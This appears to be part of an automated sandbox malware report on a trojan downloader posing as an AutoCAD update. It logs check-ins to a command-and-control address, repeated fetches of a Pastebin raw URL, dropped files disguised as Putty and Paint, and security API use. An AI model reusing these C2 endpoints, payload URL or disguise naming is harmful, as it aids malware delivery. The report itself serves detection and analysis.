Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49740 -> 147.185.221.18:44998
Source: TrafficSnort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49741 -> 147.185.221.18:44998
Source: TrafficSnort IDS: 2851746 ETPRO TROJAN MSIL/TrojanDownloader.Small.CUV Variant Checkin 192.168.11.20:49745 -> 147.185.221.18:44998
Connects to a pastebin service (likely for C&C)
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: global trafficTCP traffic: 192.168.11.20:49735 -> 147.185.221.18:44998
Source: global trafficHTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
Source: Joe Sandbox ViewIP Address: 147.185.221.18 147.185.221.18
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknownDNS query: name: icanhazip.com
Source: unknownDNS query: name: icanhazip.com
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49734 version: TLS 1.0
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.11.20:49742 version: TLS 1.0
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/LmbvnzZM HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: q-policies.gl.at.ply.gg
Source: global trafficDNS traffic detected: DNS query: icanhazip.com
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000002FDE000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.000000000292B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.000000000276B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1199190845.000000001C0A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm=C:
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadi
Source: ptKNiAaGus.exe, 00000000.00000002.3335405088.000000001BD65000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.c
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.co
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 0000004E.00000002.1367682392.0000000002787000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/r
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/ra
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/L
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/Lm
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/Lmb
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/Lmbv
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/Lmbvn
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/Lmbvnz
Source: xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/LmbvnzZ
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000011.00000002.1178226868.0000000003614000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, z4wwumki.3zg.exe, 00000021.00000002.1177243565.000000000338B000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000024.00000002.1193660323.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000032.00000002.1261787047.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, xdwdPutty.exe, 00000037.00000002.1289535355.0000000003007000.00000004.00000800.00020000.00000000.sdmp, xdwdMicrosoft Paint.exe, 00000040.00000002.1341509279.0000000002945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/LmbvnzZM
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: cmd.exeProcess created: 46

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile dump: xdwdPutty.exe.0.dr 740754944Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeFile dump: xdwdMicrosoft PowerPoint Host.exe.19.dr 739685376Jump to dropped file
Source: C:\Users\user\Desktop\ptKNiAaGus.exeCode function: 0_2_00007FFF60F60F3F NtProtectVirtualMemory,0_2_00007FFF60F60F3F
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile created: C:\Windows\xdwd.dllJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeCode function: 0_2_00007FFF60F5B8C00_2_00007FFF60F5B8C0
Source: C:\Users\user\Desktop\ptKNiAaGus.exeCode function: 0_2_00007FFF60F663B60_2_00007FFF60F663B6
Source: C:\Users\user\Desktop\ptKNiAaGus.exeCode function: 0_2_00007FFF60F5C0120_2_00007FFF60F5C012
Source: C:\Users\user\Desktop\ptKNiAaGus.exeCode function: 0_2_00007FFF60F5CE700_2_00007FFF60F5CE70
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 17_2_00007FFF60F5996B17_2_00007FFF60F5996B
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 17_2_00007FFF60F5B8C017_2_00007FFF60F5B8C0
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 17_2_00007FFF60F5CB2017_2_00007FFF60F5CB20
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 17_2_00007FFF60F5C01217_2_00007FFF60F5C012
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F7452019_2_00007FFF60F74520
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F620D019_2_00007FFF60F620D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F6936919_2_00007FFF60F69369
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F615C819_2_00007FFF60F615C8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F6A43819_2_00007FFF60F6A438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F6B86219_2_00007FFF60F6B862
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeCode function: 19_2_00007FFF60F613F919_2_00007FFF60F613F9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeCode function: 33_2_00007FFF60F421D933_2_00007FFF60F421D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeCode function: 33_2_00007FFF60F4E47033_2_00007FFF60F4E470
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeCode function: 33_2_00007FFF60F4DC8533_2_00007FFF60F4DC85
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeCode function: 33_2_00007FFF60F4936933_2_00007FFF60F49369
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeCode function: 33_2_00007FFF60F4132033_2_00007FFF60F41320
Source: C:\Users\user\xdwdPutty.exeCode function: 36_2_00007FFF60F4996B36_2_00007FFF60F4996B
Source: C:\Users\user\xdwdPutty.exeCode function: 36_2_00007FFF60F4B87536_2_00007FFF60F4B875
Source: C:\Users\user\xdwdPutty.exeCode function: 36_2_00007FFF60F4CB2936_2_00007FFF60F4CB29
Source: C:\Users\user\xdwdPutty.exeCode function: 36_2_00007FFF60F4C01236_2_00007FFF60F4C012
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 50_2_00007FFF60F2B8C050_2_00007FFF60F2B8C0
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 50_2_00007FFF60F2C01250_2_00007FFF60F2C012
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 50_2_00007FFF60F2981850_2_00007FFF60F29818
Source: C:\Users\user\xdwdPutty.exeCode function: 55_2_00007FFF60F5CB2955_2_00007FFF60F5CB29
Source: C:\Users\user\xdwdPutty.exeCode function: 55_2_00007FFF60F5C01255_2_00007FFF60F5C012
Source: C:\Users\user\xdwdPutty.exeCode function: 55_2_00007FFF60F5B8C055_2_00007FFF60F5B8C0
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 64_2_00007FFF60F699A864_2_00007FFF60F699A8
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 64_2_00007FFF60F6B87564_2_00007FFF60F6B875
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeCode function: 64_2_00007FFF60F612D064_2_00007FFF60F612D0
Source: C:\Users\user\xdwdPutty.exeCode function: 78_2_00007FFF60F399A878_2_00007FFF60F399A8
Source: C:\Users\user\xdwdPutty.exeCode function: 78_2_00007FFF60F3B8C078_2_00007FFF60F3B8C0
Source: C:\Users\user\xdwdPutty.exeCode function: 78_2_00007FFF60F3C01278_2_00007FFF60F3C012
Source: ptKNiAaGus.exeStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: xdwdPutty.exe.0.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: ptKNiAaGus.exe, 00000000.00000002.3335122785.000000001BAD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSendFile.dll2 vs ptKNiAaGus.exe
Source: ptKNiAaGus.exe, 00000000.00000002.3328765647.0000000012CA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: ptKNiAaGus.exe, 00000000.00000000.858376455.0000000000762000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: ptKNiAaGus.exeBinary or memory string: OriginalFilenameAutodesk AutoCAD Update.exeN vs ptKNiAaGus.exe
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.csSecurity API names: File.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.csSecurity API names: File.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, yRWQWPsqZ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.csSecurity API names: File.GetAccessControl
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.csSecurity API names: File.SetAccessControl
Source: ptKNiAaGus.exe, AFDAeWnBGIKu.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ptKNiAaGus.exe, TJFZgosWeymV.csSecurity API names: File.GetAccessControl
Source: ptKNiAaGus.exe, TJFZgosWeymV.csSecurity API names: File.SetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.csSecurity API names: Directory.GetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.csSecurity API names: Directory.SetAccessControl
Source: ptKNiAaGus.exe, sXNNIwuBLyDCn.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YmJpujMeeaLBNMa.csSecurity API names: File.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, YmJpujMeeaLBNMa.csSecurity API names: File.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YmJpujMeeaLBNMa.csSecurity API names: File.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, YmJpujMeeaLBNMa.csSecurity API names: File.SetAccessControl
Source: xdwdPutty.exe.33.dr, YmJpujMeeaLBNMa.csSecurity API names: File.GetAccessControl
Source: xdwdPutty.exe.33.dr, YmJpujMeeaLBNMa.csSecurity API names: File.SetAccessControl
Source: ptKNiAaGus.exe, YcZNhzMi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.csSecurity API names: Directory.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.csSecurity API names: Directory.SetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, KPKTbmek.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WJEyDHemWfF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdPutty.exe.33.dr, WJEyDHemWfF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rVDiXyUmB.csSecurity API names: Directory.GetAccessControl
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, rVDiXyUmB.csSecurity API names: Directory.SetAccessControl
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, Packet.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ptKNiAaGus.exe, ngXUOZCVh.csSecurity API names: Directory.GetAccessControl
Source: ptKNiAaGus.exe, ngXUOZCVh.csSecurity API names: Directory.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rVDiXyUmB.csSecurity API names: Directory.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rVDiXyUmB.csSecurity API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.csSecurity API names: Directory.GetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.csSecurity API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, KPKTbmek.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.csSecurity API names: Directory.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.csSecurity API names: Directory.SetAccessControl
